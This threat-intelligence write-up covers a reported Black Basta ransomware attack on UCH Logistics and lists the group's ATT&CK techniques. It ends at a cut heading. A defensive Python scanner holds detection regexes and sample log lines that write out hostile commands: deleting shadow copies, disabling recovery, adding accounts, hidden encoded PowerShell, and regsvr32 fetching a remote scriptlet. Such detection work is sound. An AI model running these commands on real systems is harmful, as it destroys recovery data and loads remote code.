UCH Logistics Ransomware Attack by Black Basta

Overview

UCH Logistics, a leading provider of transport services in the UK, recently experienced a ransomware attack by the Black Basta group. This attack involved the exfiltration of approximately 895 GB of sensitive data, including employee files and personal documents.

The Black Basta Ransomware Group

  • Active Since April 2022: Black Basta, known for its ransomware-as-a-service operations, has been targeting high-value organizations globally since its emergence in April 2022.
  • Double Extortion Technique: Employing a double extortion approach, the group threatens to release stolen data on dark web leak sites if ransom demands are not met.
  • Ransomware Characteristics: The ransomware targets both Windows and Linux systems and encrypts victims’ data so that it cannot be used without the attackers’ decryption key.

Attack Methodology

  • Data Exfiltration: Black Basta claims possession of 895 GB of UCH Logistics’ sensitive data, with a sample leaked as proof.
  • Ransom Demand: A ransom demand with a deadline has been set, though the exact amount remains undisclosed.
  • Lack of Official Response: UCH Logistics has yet to respond officially to the incident.

Tactics, Techniques, and Procedures (TTPs)

Black Basta affiliates leverage several TTPs:

  • Initial Access (T1566.001): Spear phishing emails with malicious zip files.
  • Execution (T1569.002, T1047, T1059.001): Utilizing system services, Windows Management Instrumentation, and PowerShell for payload execution.
  • Persistence (T1136, T1098, T1543.003): Creating accounts, manipulating existing accounts, and creating or modifying Windows services.
  • Privilege Escalation and Defense Evasion (T1484.001, T1218.010): Modifying group policies and using system binary proxy execution.
  • Credential Access (T1555): Using tools like Mimikatz for credential dumping.
  • Lateral Movement (T1021.001): Using Remote Desktop Protocol.
  • Impact (T1486, T1489, T1490): Encrypting data and inhibiting system recovery.
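The TTP list above is most useful to defenders when it is turned into detections. The following is an added example, not code from the original post or from any vendor's product: a small Python scanner that reads process-creation records (the kind exported from Sysmon Event ID 1 or Security Event 4688) in a constructed `timestamp | host | user | command line` format, matches command lines against generic, publicly documented patterns for several of the technique IDs listed above (T1490, T1059.001, T1218.010, T1136, T1543.003, T1047), and then ranks hosts by how many distinct techniques were observed on them. The rule patterns, the log format and the sample records are all assumptions made for the example; they describe the techniques in general, not telemetry from this incident.

```python
"""Command-line detections for several ATT&CK technique IDs from the TTP list.

Input records are assumed to be 'timestamp | host | user | command line'
(constructed format). Rules are generic detections for each technique ID,
not a claim about what this specific intrusion looked like.
"""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    technique: str       # ATT&CK technique ID from the TTP list
    name: str            # human-readable description of the behaviour
    pattern: re.Pattern  # regex applied to the full command line


# Hypothetical rule set built from commonly published detection patterns.
# Tune to your environment; every one of these can have benign sources.
RULES = [
    Rule("T1490", "Shadow copies deleted or boot recovery disabled",
         re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows"
                    r"|wmic(?:\.exe)?\s+shadowcopy\s+delete"
                    r"|bcdedit(?:\.exe)?\s+.*recoveryenabled\s+no", re.I)),
    Rule("T1059.001", "PowerShell launched hidden or with an encoded command",
         re.compile(r"powershell(?:\.exe)?\s.*(?:-e(?:nc(?:odedcommand)?)?\s"
                    r"|-w(?:indowstyle)?\s+hidden|-nop\b)", re.I)),
    Rule("T1218.010", "Regsvr32 loading a remote scriptlet",
         re.compile(r"regsvr32(?:\.exe)?\s.*(?:/i:https?://|scrobj\.dll)", re.I)),
    Rule("T1136", "Local account created from the command line",
         re.compile(r"\bnet1?(?:\.exe)?\s+user\s+\S+\s+\S+\s+/add\b", re.I)),
    Rule("T1543.003", "Windows service created via sc.exe",
         re.compile(r"\bsc(?:\.exe)?\s+create\s+\S+", re.I)),
    Rule("T1047", "WMI used to spawn a process",
         re.compile(r"wmic(?:\.exe)?\s.*process\s+call\s+create", re.I)),
]


def parse_record(line: str):
    """Parse 'timestamp | host | user | command line'; None if malformed."""
    parts = [p.strip() for p in line.split("|", 3)]
    if len(parts) != 4 or not parts[3]:
        return None
    ts, host, user, cmdline = parts
    return {"ts": ts, "host": host, "user": user, "cmdline": cmdline}


def scan(lines):
    """Return one hit per (record, rule) match, preserving input order."""
    hits = []
    for line in lines:
        rec = parse_record(line)
        if rec is None:
            continue  # skip malformed records rather than crash the scan
        for rule in RULES:
            if rule.pattern.search(rec["cmdline"]):
                hits.append({**rec, "technique": rule.technique, "name": rule.name})
    return hits


def techniques_by_host(hits):
    """Map host -> sorted list of distinct technique IDs seen on that host."""
    seen = defaultdict(set)
    for h in hits:
        seen[h["host"]].add(h["technique"])
    return {host: sorted(t) for host, t in seen.items()}


def prioritize(hits, min_techniques=2):
    """Hosts showing at least `min_techniques` distinct techniques, most first.

    A single hit is often noise; several different techniques on one host
    within a short window is the pattern worth escalating.
    """
    by_host = techniques_by_host(hits)
    ranked = [h for h, t in by_host.items() if len(t) >= min_techniques]
    return sorted(ranked, key=lambda h: (-len(by_host[h]), h))


# Constructed sample records for the example (not real telemetry).
SAMPLE_LOG = [
    "2024-03-01T09:58:02Z | WS-042 | CORP\\jdoe | powershell.exe -nop -w hidden -enc UABsAGEAYwBlAGgAbwBsAGQAZQByAA==",
    "2024-03-01T10:02:11Z | WS-042 | CORP\\jdoe | C:\\Windows\\System32\\svchost.exe -k netsvcs -p",
    "2024-03-01T10:09:47Z | WS-042 | CORP\\jdoe | regsvr32.exe /s /u /i:https://example.invalid/u.sct scrobj.dll",
    "2024-03-01T10:15:40Z | SRV-FILE01 | CORP\\svc_backup | vssadmin.exe delete shadows /all /quiet",
    "2024-03-01T10:16:05Z | SRV-FILE01 | CORP\\svc_backup | bcdedit /set {default} recoveryenabled no",
    "2024-03-01T10:20:33Z | SRV-FILE01 | CORP\\svc_backup | net user svc_helper Placeholder1 /add",
    "2024-03-01T10:31:12Z | DC01 | CORP\\admin | sc.exe create UpdSvc binPath= C:\\ProgramData\\upd.exe start= auto",
    "2024-03-01T10:35:00Z | DC01 | CORP\\admin | wmic os get caption",
    "malformed line without delimiters",
]


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for h in found:
        print(f"{h['ts']} {h['host']:<11} {h['technique']:<10} {h['name']}")
    print("escalate:", prioritize(found))
```

Running the block flags six of the nine sample records and escalates the two hosts (`SRV-FILE01` and `WS-042`) on which two different techniques appear, while `DC01` with a single service-creation hit stays below the threshold. The per-technique regexes are deliberately narrow; in production they would be backed by parent-process context and an allow-list of known administrative activity.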

Further Context and Insights